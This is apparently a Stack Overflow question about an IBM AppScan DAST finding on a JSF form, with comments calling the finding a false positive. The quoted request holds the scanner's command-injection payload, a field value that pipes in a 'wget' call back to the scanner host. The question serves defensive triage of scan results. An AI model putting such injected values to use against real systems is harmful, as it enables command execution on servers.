0

Orginal Post IBM AppScan We recently received result from IBM AppScan DAST and some of the result don't make much senses.

Parameter: **javax.faces.source**
Risk(s): It is possible to run remote commands on the web server. This usually means complete compromise of the server and its contents

Fix: Set the "uri" attribute of the "domain" entity in the clientaccesspolicy.xml file to include specific domain names instead of any domain.


The following changes were applied to the original request:
Set the value of the parameter 'form:F_16275_1_input' to
'%22%7Cwget+http%3A%2F%2F--AppScanLocalIpAddress--%3A--AppScanLocalPortNum--%2FAppScanMsg.html%3Fv
arId%3D13314%7Cecho+%22


Request/Response:
POST /***/itemliststatus.xhtml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Win32)
Connection: keep-alive
Faces-Request: partial/ajax
X-Requested-With: XMLHttpRequest
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-
javax.faces.partial.ajax=true&javax.faces.source=form%3AbuttontextSearch&javax.faces.partial.execute=form&javax.faces.partial.render=j_idt17+unreadCountForm+j_idt22+menuform+messagingAppForm+form+formDialog&form%3AbuttontextSearch=form%3AbuttontextSearch&form=form&form%3AF_16275_0=12375541&form%3AF_16275_1_input=%22%7Cwget+http%3A%2F%2F********%3A55016%2FAppScanMsg.html%3FvarId%3D13314%7Cecho+%22&form%3AF_16275_2_input=&form%3AF_16275_3_input=&form%3AF_16275_4_input=&form%3AF_16275_5_focus=&form%3AF_16275_5_input=&form
Ravi
  • 391
  • 2
  • 18
  • 1
    Another nonsense report. You realize "clientaccesspolicy.xml" is for Microsoft Silverlight and no longer even exists? See: https://www.acunetix.com/vulnerabilities/web/insecure-clientaccesspolicy-xml-file/ – Melloware May 10 '20 at 12:31
  • 1
    @Melloware yes i know. the only "silver light" in this question is google will in future bring people to this post and stop them from wasting time .. ¯\_(ツ)_/¯ taking a hit on my reputation for the general well being of the future ¯\_(ツ)_/ – Ravi May 10 '20 at 14:05
  • 1
    To me I would report all these issue on the IBM AppScan app so it stops reporting these false positives? I assume since its IBM its a 'paid' product and thus you can report these bugs directly to them as a paying customer? – Melloware May 10 '20 at 14:06
  • 1
    Agree but not sure if there is a mechanism to report it since IBM sold the AppScan to HCL in 2019. – Ravi May 10 '20 at 14:10
  • 1
    If there is no mechanism for reporting bugs then your company is using the wrong tool... – Melloware May 10 '20 at 14:19
  • The report are from our end client who do their own pen test. We need to give them enough evidenced to mark them false positive since they told us to they need a clean report for move ahead. – Ravi May 10 '20 at 14:31
  • 1
    Understood. I don't know how you are going to prove it to them without asking them to "prove" what IBM AppScan is saying can be exploited knowing that it can't. – Melloware May 10 '20 at 14:51
  • @Melloware: point them to these Stackoverflow posts... – Kukeltje May 10 '20 at 15:44
  • 1
    Ok found link : https://help.hcltechsw.com/appscan/Standard/9.0.3/en-US/c_ReportFalsePositiveTestResults025.html#c_reportfalsepositivetestresults – Ravi May 10 '20 at 18:09

0 Answers0